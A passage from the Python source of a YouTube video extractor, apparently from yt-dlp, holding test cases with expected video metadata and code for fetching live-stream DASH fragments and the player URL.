'upload_date': '20150501', # According to '<meta itemprop="datePublished"', but in other places it's 20150510
'uploader': 'Airtek',
'description': 'Retransmisión en directo de la XVIII media maratón de Zaragoza.',
'uploader_id': 'UCzTzUmjXxxacNnL8I3m4LnQ',
'title': 'Retransmisión XVIII Media maratón Zaragoza 2015',
},
'params': {
'youtube_include_dash_manifest': True,
'format': '135', # bestvideo
},
'skip': 'This live event has ended.',
},
{
# Multifeed videos (multiple cameras), URL is for Main Camera
'url': 'https://www.youtube.com/watch?v=jvGDaLqkpTg',
'info_dict': {
'id': 'jvGDaLqkpTg',
'title': 'Tom Clancy Free Weekend Rainbow Whatever',
'description': 'md5:e03b909557865076822aa169218d6a5d',
},
'playlist': [{
'info_dict': {
'id': 'jvGDaLqkpTg',
'ext': 'mp4',
'title': 'Tom Clancy Free Weekend Rainbow Whatever (Main Camera)',
'description': 'md5:e03b909557865076822aa169218d6a5d',
'duration': 10643,
'upload_date': '20161111',
'uploader': 'Team PGP',
'uploader_id': 'UChORY56LMMETTuGjXaJXvLg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UChORY56LMMETTuGjXaJXvLg',
},
}, {
'info_dict': {
'id': '3AKt1R1aDnw',
'ext': 'mp4',
'title': 'Tom Clancy Free Weekend Rainbow Whatever (Camera 2)',
'description': 'md5:e03b909557865076822aa169218d6a5d',
'duration': 10991,
'upload_date': '20161111',
'uploader': 'Team PGP',
'uploader_id': 'UChORY56LMMETTuGjXaJXvLg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UChORY56LMMETTuGjXaJXvLg',
},
}, {
'info_dict': {
'id': 'RtAMM00gpVc',
'ext': 'mp4',
'title': 'Tom Clancy Free Weekend Rainbow Whatever (Camera 3)',
'description': 'md5:e03b909557865076822aa169218d6a5d',
'duration': 10995,
'upload_date': '20161111',
'uploader': 'Team PGP',
'uploader_id': 'UChORY56LMMETTuGjXaJXvLg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UChORY56LMMETTuGjXaJXvLg',
},
}, {
'info_dict': {
'id': '6N2fdlP3C5U',
'ext': 'mp4',
'title': 'Tom Clancy Free Weekend Rainbow Whatever (Camera 4)',
'description': 'md5:e03b909557865076822aa169218d6a5d',
'duration': 10990,
'upload_date': '20161111',
'uploader': 'Team PGP',
'uploader_id': 'UChORY56LMMETTuGjXaJXvLg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UChORY56LMMETTuGjXaJXvLg',
},
}],
'params': {
'skip_download': True,
},
'skip': 'Not multifeed anymore',
},
{
# Multifeed video with comma in title (see https://github.com/ytdl-org/youtube-dl/issues/8536)
'url': 'https://www.youtube.com/watch?v=gVfLd0zydlo',
'info_dict': {
'id': 'gVfLd0zydlo',
'title': 'DevConf.cz 2016 Day 2 Workshops 1 14:00 - 15:30',
},
'playlist_count': 2,
'skip': 'Not multifeed anymore',
},
{
'url': 'https://vid.plus/FlRa-iH7PGw',
'only_matching': True,
},
{
'url': 'https://zwearz.com/watch/9lWxNJF-ufM/electra-woman-dyna-girl-official-trailer-grace-helbig.html',
'only_matching': True,
},
{
# Title with JS-like syntax "};" (see https://github.com/ytdl-org/youtube-dl/issues/7468)
# Also tests cut-off URL expansion in video description (see
# https://github.com/ytdl-org/youtube-dl/issues/1892,
# https://github.com/ytdl-org/youtube-dl/issues/8164)
'url': 'https://www.youtube.com/watch?v=lsguqyKfVQg',
'info_dict': {
'id': 'lsguqyKfVQg',
'ext': 'mp4',
'title': '{dark walk}; Loki/AC/Dishonored; collab w/Elflover21',
'alt_title': 'Dark Walk',
'description': 'md5:8085699c11dc3f597ce0410b0dcbb34a',
'duration': 133,
'upload_date': '20151119',
'uploader_id': 'IronSoulElf',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/IronSoulElf',
'uploader': 'IronSoulElf',
'creator': 'Todd Haberman;\nDaniel Law Heath and Aaron Kaplan',
'track': 'Dark Walk',
'artist': 'Todd Haberman;\nDaniel Law Heath and Aaron Kaplan',
'album': 'Position Music - Production Music Vol. 143 - Dark Walk',
'thumbnail': 'https://i.ytimg.com/vi_webp/lsguqyKfVQg/maxresdefault.webp',
'categories': ['Film & Animation'],
'view_count': int,
'live_status': 'not_live',
'channel_url': 'https://www.youtube.com/channel/UCTSRgz5jylBvFt_S7wnsqLQ',
'channel_id': 'UCTSRgz5jylBvFt_S7wnsqLQ',
'tags': 'count:13',
'availability': 'public',
'channel': 'IronSoulElf',
'playable_in_embed': True,
'like_count': int,
'age_limit': 0,
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
},
{
# Tags with '};' (see https://github.com/ytdl-org/youtube-dl/issues/7468)
'url': 'https://www.youtube.com/watch?v=Ms7iBXnlUO8',
'only_matching': True,
},
{
# Video with yt:stretch=17:0
'url': 'https://www.youtube.com/watch?v=Q39EVAstoRM',
'info_dict': {
'id': 'Q39EVAstoRM',
'ext': 'mp4',
'title': 'Clash Of Clans#14 Dicas De Ataque Para CV 4',
'description': 'md5:ee18a25c350637c8faff806845bddee9',
'upload_date': '20151107',
'uploader_id': 'UCCr7TALkRbo3EtFzETQF1LA',
'uploader': 'CH GAMER DROID',
},
'params': {
'skip_download': True,
},
'skip': 'This video does not exist.',
},
{
# Video with incomplete 'yt:stretch=16:'
'url': 'https://www.youtube.com/watch?v=FRhJzUSJbGI',
'only_matching': True,
},
{
# Video licensed under Creative Commons
'url': 'https://www.youtube.com/watch?v=M4gD1WSo5mA',
'info_dict': {
'id': 'M4gD1WSo5mA',
'ext': 'mp4',
'title': 'md5:e41008789470fc2533a3252216f1c1d1',
'description': 'md5:a677553cf0840649b731a3024aeff4cc',
'duration': 721,
'upload_date': '20150128',
'uploader_id': 'BerkmanCenter',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/BerkmanCenter',
'uploader': 'The Berkman Klein Center for Internet & Society',
'license': 'Creative Commons Attribution license (reuse allowed)',
'channel_id': 'UCuLGmD72gJDBwmLw06X58SA',
'channel_url': 'https://www.youtube.com/channel/UCuLGmD72gJDBwmLw06X58SA',
'like_count': int,
'age_limit': 0,
'tags': ['Copyright (Legal Subject)', 'Law (Industry)', 'William W. Fisher (Author)'],
'channel': 'The Berkman Klein Center for Internet & Society',
'availability': 'public',
'view_count': int,
'categories': ['Education'],
'thumbnail': 'https://i.ytimg.com/vi_webp/M4gD1WSo5mA/maxresdefault.webp',
'live_status': 'not_live',
'playable_in_embed': True,
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
},
{
# Channel-like uploader_url
'url': 'https://www.youtube.com/watch?v=eQcmzGIKrzg',
'info_dict': {
'id': 'eQcmzGIKrzg',
'ext': 'mp4',
'title': 'Democratic Socialism and Foreign Policy | Bernie Sanders',
'description': 'md5:13a2503d7b5904ef4b223aa101628f39',
'duration': 4060,
'upload_date': '20151120',
'uploader': 'Bernie Sanders',
'uploader_id': 'UCH1dpzjCEiGAt8CXkryhkZg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCH1dpzjCEiGAt8CXkryhkZg',
'license': 'Creative Commons Attribution license (reuse allowed)',
'playable_in_embed': True,
'tags': 'count:12',
'like_count': int,
'channel_id': 'UCH1dpzjCEiGAt8CXkryhkZg',
'age_limit': 0,
'availability': 'public',
'categories': ['News & Politics'],
'channel': 'Bernie Sanders',
'thumbnail': 'https://i.ytimg.com/vi_webp/eQcmzGIKrzg/maxresdefault.webp',
'view_count': int,
'live_status': 'not_live',
'channel_url': 'https://www.youtube.com/channel/UCH1dpzjCEiGAt8CXkryhkZg',
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://www.youtube.com/watch?feature=player_embedded&amp;v=V36LpHqtcDY',
'only_matching': True,
},
{
# YouTube Red paid video (https://github.com/ytdl-org/youtube-dl/issues/10059)
'url': 'https://www.youtube.com/watch?v=i1Ko8UG-Tdo',
'only_matching': True,
},
{
# Rental video preview
'url': 'https://www.youtube.com/watch?v=yYr8q0y5Jfg',
'info_dict': {
'id': 'uGpuVWrhIzE',
'ext': 'mp4',
'title': 'Piku - Trailer',
'description': 'md5:c36bd60c3fd6f1954086c083c72092eb',
'upload_date': '20150811',
'uploader': 'FlixMatrix',
'uploader_id': 'FlixMatrixKaravan',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/FlixMatrixKaravan',
'license': 'Standard YouTube License',
},
'params': {
'skip_download': True,
},
'skip': 'This video is not available.',
},
{
# YouTube Red video with episode data
'url': 'https://www.youtube.com/watch?v=iqKdEhx-dD4',
'info_dict': {
'id': 'iqKdEhx-dD4',
'ext': 'mp4',
'title': 'Isolation - Mind Field (Ep 1)',
'description': 'md5:f540112edec5d09fc8cc752d3d4ba3cd',
'duration': 2085,
'upload_date': '20170118',
'uploader': 'Vsauce',
'uploader_id': 'Vsauce',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/Vsauce',
'series': 'Mind Field',
'season_number': 1,
'episode_number': 1,
'thumbnail': 'https://i.ytimg.com/vi_webp/iqKdEhx-dD4/maxresdefault.webp',
'tags': 'count:12',
'view_count': int,
'availability': 'public',
'age_limit': 0,
'channel': 'Vsauce',
'episode': 'Episode 1',
'categories': ['Entertainment'],
'season': 'Season 1',
'channel_id': 'UC6nSFpj9HTCZ5t-N3Rm3-HA',
'channel_url': 'https://www.youtube.com/channel/UC6nSFpj9HTCZ5t-N3Rm3-HA',
'like_count': int,
'playable_in_embed': True,
'live_status': 'not_live',
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
'expected_warnings': [
'Skipping DASH manifest',
],
},
{
# The following content has been identified by the YouTube community
# as inappropriate or offensive to some audiences.
'url': 'https://www.youtube.com/watch?v=6SJNVb0GnPI',
'info_dict': {
'id': '6SJNVb0GnPI',
'ext': 'mp4',
'title': 'Race Differences in Intelligence',
'description': 'md5:5d161533167390427a1f8ee89a1fc6f1',
'duration': 965,
'upload_date': '20140124',
'uploader': 'New Century Foundation',
'uploader_id': 'UCEJYpZGqgUob0zVVEaLhvVg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCEJYpZGqgUob0zVVEaLhvVg',
},
'params': {
'skip_download': True,
},
'skip': 'This video has been removed for violating YouTube\'s policy on hate speech.',
},
{
# itag 212
'url': '1t24XAntNCY',
'only_matching': True,
},
{
# geo restricted to JP
'url': 'sJL6WA-aGkQ',
'only_matching': True,
},
{
'url': 'https://invidio.us/watch?v=BaW_jenozKc',
'only_matching': True,
},
{
'url': 'https://redirect.invidious.io/watch?v=BaW_jenozKc',
'only_matching': True,
},
{
# from https://nitter.pussthecat.org/YouTube/status/1360363141947944964#m
'url': 'https://redirect.invidious.io/Yh0AhrY9GjA',
'only_matching': True,
},
{
# DRM protected
'url': 'https://www.youtube.com/watch?v=s7_qI6_mIXc',
'only_matching': True,
},
{
# Video with unsupported adaptive stream type formats
'url': 'https://www.youtube.com/watch?v=Z4Vy8R84T1U',
'info_dict': {
'id': 'Z4Vy8R84T1U',
'ext': 'mp4',
'title': 'saman SMAN 53 Jakarta(Sancety) opening COFFEE4th at SMAN 53 Jakarta',
'description': 'md5:d41d8cd98f00b204e9800998ecf8427e',
'duration': 433,
'upload_date': '20130923',
'uploader': 'Amelia Putri Harwita',
'uploader_id': 'UCpOxM49HJxmC1qCalXyB3_Q',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCpOxM49HJxmC1qCalXyB3_Q',
'formats': 'maxcount:10',
},
'params': {
'skip_download': True,
'youtube_include_dash_manifest': False,
},
'skip': 'not actual anymore',
},
{
# Youtube Music Auto-generated description
'url': 'https://music.youtube.com/watch?v=MgNrAu2pzNs',
'info_dict': {
'id': 'MgNrAu2pzNs',
'ext': 'mp4',
'title': 'Voyeur Girl',
'description': 'md5:7ae382a65843d6df2685993e90a8628f',
'upload_date': '20190312',
'uploader': 'Stephen - Topic',
'uploader_id': 'UC-pWHpBjdGG69N9mM2auIAA',
'artist': 'Stephen',
'track': 'Voyeur Girl',
'album': 'it\'s too much love to know my dear',
'release_date': '20190313',
'release_year': 2019,
'alt_title': 'Voyeur Girl',
'view_count': int,
'uploader_url': 'http://www.youtube.com/channel/UC-pWHpBjdGG69N9mM2auIAA',
'playable_in_embed': True,
'like_count': int,
'categories': ['Music'],
'channel_url': 'https://www.youtube.com/channel/UC-pWHpBjdGG69N9mM2auIAA',
'channel': 'Stephen',
'availability': 'public',
'creator': 'Stephen',
'duration': 169,
'thumbnail': 'https://i.ytimg.com/vi_webp/MgNrAu2pzNs/maxresdefault.webp',
'age_limit': 0,
'channel_id': 'UC-pWHpBjdGG69N9mM2auIAA',
'tags': 'count:11',
'live_status': 'not_live',
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://www.youtubekids.com/watch?v=3b8nCWDgZ6Q',
'only_matching': True,
},
{
# invalid -> valid video id redirection
'url': 'DJztXj2GPfl',
'info_dict': {
'id': 'DJztXj2GPfk',
'ext': 'mp4',
'title': 'Panjabi MC - Mundian To Bach Ke (The Dictator Soundtrack)',
'description': 'md5:bf577a41da97918e94fa9798d9228825',
'upload_date': '20090125',
'uploader': 'Prochorowka',
'uploader_id': 'Prochorowka',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/Prochorowka',
'artist': 'Panjabi MC',
'track': 'Beware of the Boys (Mundian to Bach Ke) - Motivo Hi-Lectro Remix',
'album': 'Beware of the Boys (Mundian To Bach Ke)',
},
'params': {
'skip_download': True,
},
'skip': 'Video unavailable',
},
{
# empty description results in an empty string
'url': 'https://www.youtube.com/watch?v=x41yOUIvK2k',
'info_dict': {
'id': 'x41yOUIvK2k',
'ext': 'mp4',
'title': 'IMG 3456',
'description': '',
'upload_date': '20170613',
'uploader_id': 'ElevageOrVert',
'uploader': 'ElevageOrVert',
'view_count': int,
'thumbnail': 'https://i.ytimg.com/vi_webp/x41yOUIvK2k/maxresdefault.webp',
'uploader_url': 'http://www.youtube.com/user/ElevageOrVert',
'like_count': int,
'channel_id': 'UCo03ZQPBW5U4UC3regpt1nw',
'tags': [],
'channel_url': 'https://www.youtube.com/channel/UCo03ZQPBW5U4UC3regpt1nw',
'availability': 'public',
'age_limit': 0,
'categories': ['Pets & Animals'],
'duration': 7,
'playable_in_embed': True,
'live_status': 'not_live',
'channel': 'ElevageOrVert',
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
},
{
# with '};' inside yt initial data (see [1])
# see [2] for an example with '};' inside ytInitialPlayerResponse
# 1. https://github.com/ytdl-org/youtube-dl/issues/27093
# 2. https://github.com/ytdl-org/youtube-dl/issues/27216
'url': 'https://www.youtube.com/watch?v=CHqg6qOn4no',
'info_dict': {
'id': 'CHqg6qOn4no',
'ext': 'mp4',
'title': 'Part 77 Sort a list of simple types in c#',
'description': 'md5:b8746fa52e10cdbf47997903f13b20dc',
'upload_date': '20130831',
'uploader_id': 'kudvenkat',
'uploader': 'kudvenkat',
'channel_id': 'UCCTVrRB5KpIiK6V2GGVsR1Q',
'like_count': int,
'uploader_url': 'http://www.youtube.com/user/kudvenkat',
'channel_url': 'https://www.youtube.com/channel/UCCTVrRB5KpIiK6V2GGVsR1Q',
'live_status': 'not_live',
'categories': ['Education'],
'availability': 'public',
'thumbnail': 'https://i.ytimg.com/vi/CHqg6qOn4no/sddefault.jpg',
'tags': 'count:12',
'playable_in_embed': True,
'age_limit': 0,
'view_count': int,
'duration': 522,
'channel': 'kudvenkat',
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
},
{
# another example of '};' in ytInitialData
'url': 'https://www.youtube.com/watch?v=gVfgbahppCY',
'only_matching': True,
},
{
'url': 'https://www.youtube.com/watch_popup?v=63RmMXCd_bQ',
'only_matching': True,
},
{
# https://github.com/ytdl-org/youtube-dl/pull/28094
'url': 'OtqTfy26tG0',
'info_dict': {
'id': 'OtqTfy26tG0',
'ext': 'mp4',
'title': 'Burn Out',
'description': 'md5:8d07b84dcbcbfb34bc12a56d968b6131',
'upload_date': '20141120',
'uploader': 'The Cinematic Orchestra - Topic',
'uploader_id': 'UCIzsJBIyo8hhpFm1NK0uLgw',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCIzsJBIyo8hhpFm1NK0uLgw',
'artist': 'The Cinematic Orchestra',
'track': 'Burn Out',
'album': 'Every Day',
'like_count': int,
'live_status': 'not_live',
'alt_title': 'Burn Out',
'duration': 614,
'age_limit': 0,
'view_count': int,
'channel_url': 'https://www.youtube.com/channel/UCIzsJBIyo8hhpFm1NK0uLgw',
'creator': 'The Cinematic Orchestra',
'channel': 'The Cinematic Orchestra',
'tags': ['The Cinematic Orchestra', 'Every Day', 'Burn Out'],
'channel_id': 'UCIzsJBIyo8hhpFm1NK0uLgw',
'availability': 'public',
'thumbnail': 'https://i.ytimg.com/vi/OtqTfy26tG0/maxresdefault.jpg',
'categories': ['Music'],
'playable_in_embed': True,
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
},
{
# controversial video, only works with bpctr when authenticated with cookies
'url': 'https://www.youtube.com/watch?v=nGC3D_FkCmg',
'only_matching': True,
},
{
# controversial video, requires bpctr/contentCheckOk
'url': 'https://www.youtube.com/watch?v=SZJvDhaSDnc',
'info_dict': {
'id': 'SZJvDhaSDnc',
'ext': 'mp4',
'title': 'San Diego teen commits suicide after bullying over embarrassing video',
'channel_id': 'UC-SJ6nODDmufqBzPBwCvYvQ',
'uploader': 'CBS Mornings',
'uploader_id': 'CBSThisMorning',
'upload_date': '20140716',
'description': 'md5:acde3a73d3f133fc97e837a9f76b53b7',
'duration': 170,
'categories': ['News & Politics'],
'uploader_url': 'http://www.youtube.com/user/CBSThisMorning',
'view_count': int,
'channel': 'CBS Mornings',
'tags': ['suicide', 'bullying', 'video', 'cbs', 'news'],
'thumbnail': 'https://i.ytimg.com/vi/SZJvDhaSDnc/hqdefault.jpg',
'age_limit': 18,
'availability': 'needs_auth',
'channel_url': 'https://www.youtube.com/channel/UC-SJ6nODDmufqBzPBwCvYvQ',
'like_count': int,
'live_status': 'not_live',
'playable_in_embed': True,
'channel_follower_count': int
}
},
{
# restricted location, https://github.com/ytdl-org/youtube-dl/issues/28685
'url': 'cBvYw8_A0vQ',
'info_dict': {
'id': 'cBvYw8_A0vQ',
'ext': 'mp4',
'title': '4K Ueno Okachimachi Street Scenes 上野御徒町歩き',
'description': 'md5:ea770e474b7cd6722b4c95b833c03630',
'upload_date': '20201120',
'uploader': 'Walk around Japan',
'uploader_id': 'UC3o_t8PzBmXf5S9b7GLx1Mw',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UC3o_t8PzBmXf5S9b7GLx1Mw',
'duration': 1456,
'categories': ['Travel & Events'],
'channel_id': 'UC3o_t8PzBmXf5S9b7GLx1Mw',
'view_count': int,
'channel': 'Walk around Japan',
'tags': ['Ueno Tokyo', 'Okachimachi Tokyo', 'Ameyoko Street', 'Tokyo attraction', 'Travel in Tokyo'],
'thumbnail': 'https://i.ytimg.com/vi_webp/cBvYw8_A0vQ/hqdefault.webp',
'age_limit': 0,
'availability': 'public',
'channel_url': 'https://www.youtube.com/channel/UC3o_t8PzBmXf5S9b7GLx1Mw',
'live_status': 'not_live',
'playable_in_embed': True,
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
}, {
# Has multiple audio streams
'url': 'WaOKSUlf4TM',
'only_matching': True
}, {
# Requires Premium: has format 141 when requested using YTM url
'url': 'https://music.youtube.com/watch?v=XclachpHxis',
'only_matching': True
}, {
# multiple subtitles with same lang_code
'url': 'https://www.youtube.com/watch?v=wsQiKKfKxug',
'only_matching': True,
}, {
# Force use android client fallback
'url': 'https://www.youtube.com/watch?v=YOelRv7fMxY',
'info_dict': {
'id': 'YOelRv7fMxY',
'title': 'DIGGING A SECRET TUNNEL Part 1',
'ext': '3gp',
'upload_date': '20210624',
'channel_id': 'UCp68_FLety0O-n9QU6phsgw',
'uploader': 'colinfurze',
'uploader_id': 'colinfurze',
'channel_url': r're:https?://(?:www\.)?youtube\.com/channel/UCp68_FLety0O-n9QU6phsgw',
'description': 'md5:5d5991195d599b56cd0c4148907eec50',
'duration': 596,
'categories': ['Entertainment'],
'uploader_url': 'http://www.youtube.com/user/colinfurze',
'view_count': int,
'channel': 'colinfurze',
'tags': ['Colin', 'furze', 'Terry', 'tunnel', 'underground', 'bunker'],
'thumbnail': 'https://i.ytimg.com/vi/YOelRv7fMxY/maxresdefault.jpg',
'age_limit': 0,
'availability': 'public',
'like_count': int,
'live_status': 'not_live',
'playable_in_embed': True,
'channel_follower_count': int
},
'params': {
'format': '17', # 3gp format available on android
'extractor_args': {'youtube': {'player_client': ['android']}},
},
},
{
# Skip download of additional client configs (remix client config in this case)
'url': 'https://music.youtube.com/watch?v=MgNrAu2pzNs',
'only_matching': True,
'params': {
'extractor_args': {'youtube': {'player_skip': ['configs']}},
},
}, {
# shorts
'url': 'https://www.youtube.com/shorts/BGQWPY4IigY',
'only_matching': True,
}, {
'note': 'Storyboards',
'url': 'https://www.youtube.com/watch?v=5KLPxDtMqe8',
'info_dict': {
'id': '5KLPxDtMqe8',
'ext': 'mhtml',
'format_id': 'sb0',
'title': 'Your Brain is Plastic',
'uploader_id': 'scishow',
'description': 'md5:89cd86034bdb5466cd87c6ba206cd2bc',
'upload_date': '20140324',
'uploader': 'SciShow',
'like_count': int,
'channel_id': 'UCZYTClx2T1of7BRZ86-8fow',
'channel_url': 'https://www.youtube.com/channel/UCZYTClx2T1of7BRZ86-8fow',
'view_count': int,
'thumbnail': 'https://i.ytimg.com/vi/5KLPxDtMqe8/maxresdefault.jpg',
'playable_in_embed': True,
'tags': 'count:12',
'uploader_url': 'http://www.youtube.com/user/scishow',
'availability': 'public',
'channel': 'SciShow',
'live_status': 'not_live',
'duration': 248,
'categories': ['Education'],
'age_limit': 0,
'channel_follower_count': int
}, 'params': {'format': 'mhtml', 'skip_download': True}
}, {
# Ensure video upload_date is in UTC timezone (video was uploaded 1641170939)
'url': 'https://www.youtube.com/watch?v=2NUZ8W2llS4',
'info_dict': {
'id': '2NUZ8W2llS4',
'ext': 'mp4',
'title': 'The NP that test your phone performance 🙂',
'description': 'md5:144494b24d4f9dfacb97c1bbef5de84d',
'uploader': 'Leon Nguyen',
'uploader_id': 'VNSXIII',
'uploader_url': 'http://www.youtube.com/user/VNSXIII',
'channel_id': 'UCRqNBSOHgilHfAczlUmlWHA',
'channel_url': 'https://www.youtube.com/channel/UCRqNBSOHgilHfAczlUmlWHA',
'duration': 21,
'view_count': int,
'age_limit': 0,
'categories': ['Gaming'],
'tags': 'count:23',
'playable_in_embed': True,
'live_status': 'not_live',
'upload_date': '20220103',
'like_count': int,
'availability': 'public',
'channel': 'Leon Nguyen',
'thumbnail': 'https://i.ytimg.com/vi_webp/2NUZ8W2llS4/maxresdefault.webp',
'channel_follower_count': int
}
}, {
# date text is premiered video, ensure upload date in UTC (published 1641172509)
'url': 'https://www.youtube.com/watch?v=mzZzzBU6lrM',
'info_dict': {
'id': 'mzZzzBU6lrM',
'ext': 'mp4',
'title': 'I Met GeorgeNotFound In Real Life...',
'description': 'md5:cca98a355c7184e750f711f3a1b22c84',
'uploader': 'Quackity',
'uploader_id': 'QuackityHQ',
'uploader_url': 'http://www.youtube.com/user/QuackityHQ',
'channel_id': 'UC_8NknAFiyhOUaZqHR3lq3Q',
'channel_url': 'https://www.youtube.com/channel/UC_8NknAFiyhOUaZqHR3lq3Q',
'duration': 955,
'view_count': int,
'age_limit': 0,
'categories': ['Entertainment'],
'tags': 'count:26',
'playable_in_embed': True,
'live_status': 'not_live',
'release_timestamp': 1641172509,
'release_date': '20220103',
'upload_date': '20220103',
'like_count': int,
'availability': 'public',
'channel': 'Quackity',
'thumbnail': 'https://i.ytimg.com/vi/mzZzzBU6lrM/maxresdefault.jpg',
'channel_follower_count': int
}
},
{ # continuous livestream. Microformat upload date should be preferred.
# Upload date was 2021-06-19 (not UTC), while stream start is 2021-11-27
'url': 'https://www.youtube.com/watch?v=kgx4WGK0oNU',
'info_dict': {
'id': 'kgx4WGK0oNU',
'title': r're:jazz\/lofi hip hop radio🌱chill beats to relax\/study to \[LIVE 24\/7\] \d{4}-\d{2}-\d{2} \d{2}:\d{2}',
'ext': 'mp4',
'channel_id': 'UC84whx2xxsiA1gXHXXqKGOA',
'availability': 'public',
'age_limit': 0,
'release_timestamp': 1637975704,
'upload_date': '20210619',
'channel_url': 'https://www.youtube.com/channel/UC84whx2xxsiA1gXHXXqKGOA',
'live_status': 'is_live',
'thumbnail': 'https://i.ytimg.com/vi/kgx4WGK0oNU/maxresdefault.jpg',
'uploader': '阿鲍Abao',
'uploader_url': 'http://www.youtube.com/channel/UC84whx2xxsiA1gXHXXqKGOA',
'channel': 'Abao in Tokyo',
'channel_follower_count': int,
'release_date': '20211127',
'tags': 'count:39',
'categories': ['People & Blogs'],
'like_count': int,
'uploader_id': 'UC84whx2xxsiA1gXHXXqKGOA',
'view_count': int,
'playable_in_embed': True,
'description': 'md5:2ef1d002cad520f65825346e2084e49d',
},
'params': {'skip_download': True}
},
]
@classmethod
def suitable(cls, url):
from ..utils import parse_qs
qs = parse_qs(url)
if qs.get('list', [None])[0]:
return False
return super(YoutubeIE, cls).suitable(url)
def __init__(self, *args, **kwargs):
super(YoutubeIE, self).__init__(*args, **kwargs)
self._code_cache = {}
self._player_cache = {}
def _prepare_live_from_start_formats(self, formats, video_id, live_start_time, url, webpage_url, smuggled_data):
lock = threading.Lock()
is_live = True
start_time = time.time()
formats = [f for f in formats if f.get('is_from_start')]
def refetch_manifest(format_id, delay):
nonlocal formats, start_time, is_live
if time.time() <= start_time + delay:
return
_, _, prs, player_url = self._download_player_responses(url, smuggled_data, video_id, webpage_url)
video_details = traverse_obj(
prs, (..., 'videoDetails'), expected_type=dict, default=[])
microformats = traverse_obj(
prs, (..., 'microformat', 'playerMicroformatRenderer'),
expected_type=dict, default=[])
_, is_live, _, formats = self._list_formats(video_id, microformats, video_details, prs, player_url)
start_time = time.time()
def mpd_feed(format_id, delay):
"""
@returns (manifest_url, manifest_stream_number, is_live) or None
"""
with lock:
refetch_manifest(format_id, delay)
f = next((f for f in formats if f['format_id'] == format_id), None)
if not f:
if not is_live:
self.to_screen(f'{video_id}: Video is no longer live')
else:
self.report_warning(
f'Cannot find refreshed manifest for format {format_id}{bug_reports_message()}')
return None
return f['manifest_url'], f['manifest_stream_number'], is_live
for f in formats:
f['is_live'] = True
f['protocol'] = 'http_dash_segments_generator'
f['fragments'] = functools.partial(
self._live_dash_fragments, f['format_id'], live_start_time, mpd_feed)
def _live_dash_fragments(self, format_id, live_start_time, mpd_feed, ctx):
FETCH_SPAN, MAX_DURATION = 5, 432000
mpd_url, stream_number, is_live = None, None, True
begin_index = 0
download_start_time = ctx.get('start') or time.time()
lack_early_segments = download_start_time - (live_start_time or download_start_time) > MAX_DURATION
if lack_early_segments:
self.report_warning(bug_reports_message(
'Starting download from the last 120 hours of the live stream since '
'YouTube does not have data before that. If you think this is wrong,'), only_once=True)
lack_early_segments = True
known_idx, no_fragment_score, last_segment_url = begin_index, 0, None
fragments, fragment_base_url = None, None
def _extract_sequence_from_mpd(refresh_sequence, immediate):
nonlocal mpd_url, stream_number, is_live, no_fragment_score, fragments, fragment_base_url
# Obtain from MPD's maximum seq value
old_mpd_url = mpd_url
last_error = ctx.pop('last_error', None)
expire_fast = immediate or last_error and isinstance(last_error, compat_HTTPError) and last_error.code == 403
mpd_url, stream_number, is_live = (mpd_feed(format_id, 5 if expire_fast else 18000)
or (mpd_url, stream_number, False))
if not refresh_sequence:
if expire_fast and not is_live:
return False, last_seq
elif old_mpd_url == mpd_url:
return True, last_seq
try:
fmts, _ = self._extract_mpd_formats_and_subtitles(
mpd_url, None, note=False, errnote=False, fatal=False)
except ExtractorError:
fmts = None
if not fmts:
no_fragment_score += 2
return False, last_seq
fmt_info = next(x for x in fmts if x['manifest_stream_number'] == stream_number)
fragments = fmt_info['fragments']
fragment_base_url = fmt_info['fragment_base_url']
assert fragment_base_url
_last_seq = int(re.search(r'(?:/|^)sq/(\d+)', fragments[-1]['path']).group(1))
return True, _last_seq
while is_live:
fetch_time = time.time()
if no_fragment_score > 30:
return
if last_segment_url:
# Obtain from "X-Head-Seqnum" header value from each segment
try:
urlh = self._request_webpage(
last_segment_url, None, note=False, errnote=False, fatal=False)
except ExtractorError:
urlh = None
last_seq = try_get(urlh, lambda x: int_or_none(x.headers['X-Head-Seqnum']))
if last_seq is None:
no_fragment_score += 2
last_segment_url = None
continue
else:
should_continue, last_seq = _extract_sequence_from_mpd(True, no_fragment_score > 15)
no_fragment_score += 2
if not should_continue:
continue
if known_idx > last_seq:
last_segment_url = None
continue
last_seq += 1
if begin_index < 0 and known_idx < 0:
# skip from the start when it's negative value
known_idx = last_seq + begin_index
if lack_early_segments:
known_idx = max(known_idx, last_seq - int(MAX_DURATION // fragments[-1]['duration']))
try:
for idx in range(known_idx, last_seq):
# do not update sequence here or you'll get skipped some part of it
should_continue, _ = _extract_sequence_from_mpd(False, False)
if not should_continue:
known_idx = idx - 1
raise ExtractorError('breaking out of outer loop')
last_segment_url = urljoin(fragment_base_url, 'sq/%d' % idx)
yield {
'url': last_segment_url,
}
if known_idx == last_seq:
no_fragment_score += 5
else:
no_fragment_score = 0
known_idx = last_seq
except ExtractorError:
continue
time.sleep(max(0, FETCH_SPAN + fetch_time - time.time()))
def _extract_player_url(self, *ytcfgs, webpage=None):
player_url = traverse_obj(
ytcfgs, (..., 'PLAYER_JS_URL'), (..., 'WEB_PLAYER_CONTEXT_CONFIGS', ..., 'jsUrl'),
get_all=False, expected_type=compat_str)
if not player_url:
return
return urljoin('https://www.youtube.com', player_url)
def _download_player_url(self, video_id, fatal=False):
res = self._download_webpage(
